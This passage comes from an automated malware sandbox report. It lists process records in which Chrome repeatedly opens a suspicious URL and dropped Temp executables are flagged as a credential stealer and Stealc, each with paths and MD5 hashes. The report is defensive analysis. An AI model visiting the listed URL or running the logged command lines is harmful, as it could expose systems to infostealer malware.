MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	86
Start time:	01:33:37
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1972,i,13595040883661267341,5298112090488421856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	87
Start time:	01:33:37
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2000,i,2165972809307344740,441943955686262932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	88
Start time:	01:33:38
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	89
Start time:	01:33:38
Start date:	07/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:
File size:	3'169'280 bytes
MD5 hash:	ED91FED1365AF41A389141266378CFC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	90
Start time:	01:33:39
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	91
Start time:	01:33:39
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1976,i,11014613956716725374,17879268145922355351,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	92
Start time:	01:33:40
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1932,i,3839464556416060848,13026013853573635163,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	93
Start time:	01:33:40
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	94
Start time:	01:33:40
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	95
Start time:	01:33:40
Start date:	07/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe"
Imagebase:	0xaa0000
File size:	3'249'664 bytes
MD5 hash:	DABD794D5925E01CE2525D17795B56E1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000005F.00000002.3080054102.000000000106A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	96
Start time:	01:33:41
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	97
Start time:	01:33:41
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1992,i,7238726655923870739,5759593871076519028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	98
Start time:	01:33:41
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	99
Start time:	01:33:41
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1988,i,9243568103408200411,14083164291610540486,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	100
Start time:	01:33:41
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1984,i,15419181765585057394,6670311027553153785,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	101
Start time:	01:33:42
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2024,i,14402791647519130237,17028031831812843495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	102
Start time:	01:33:42
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	103
Start time:	01:33:42
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	104
Start time:	01:33:43
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1916 --field-trial-handle=2028,i,14704702612634137022,13283822498721106839,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	105
Start time:	01:33:43
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1172 --field-trial-handle=2012,i,5999604552990070426,13015335531134966904,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	106
Start time:	01:33:43
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	107
Start time:	01:33:44
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1980,i,13800168806641850337,1252832294211567749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	108
Start time:	01:33:44
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	109
Start time:	01:33:45
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	110
Start time:	01:33:45
Start date:	07/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe"
Imagebase:	0xd10000
File size:	2'755'072 bytes
MD5 hash:	ACC11F67CF4889111898285909FFAC31
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	111
Start time:	01:33:45
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1984,i,6342465718296439963,7063653370630127656,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	112
Start time:	01:33:45
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	113
Start time:	01:33:45
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1996,i,14624050743364290986,7834764246845110021,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	114
Start time:	01:33:46
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1996,i,2440065999085773376,4668946962335946973,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	115
Start time:	01:33:46
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	116
Start time:	01:33:47
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	117
Start time:	01:33:47
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2016,i,979502028839624058,13434839107830149959,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	118
Start time:	01:33:47
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	119
Start time:	01:33:48
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1992,i,8220830113635767741,8511822262946293777,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	120
Start time:	01:33:48
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1968,i,17173762750527162096,5079444058244670986,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	121
Start time:	01:33:48
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	122
Start time:	01:33:49
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	123
Start time:	01:33:49
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	124
Start time:	01:33:49
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1156,i,5154185688367289602,11407614901677859174,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	125
Start time:	01:33:50
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=692 --field-trial-handle=2012,i,5788619707603885448,5455322155689001163,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	126
Start time:	01:33:50
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2004,i,13036272579540178643,1927237139647604030,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	127
Start time:	01:33:51
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	128
Start time:	01:33:51
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	129
Start time:	01:33:51
Start date:	07/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe"
Imagebase:	0xc90000
File size:	2'097'152 bytes
MD5 hash:	3079517B64FB39F7AE3B94F9BA77F37F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000081.00000003.2843067219.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	130
Start time:	01:33:52
Start date:	07/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2008,i,3918962276335397993,18229504157229042942,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
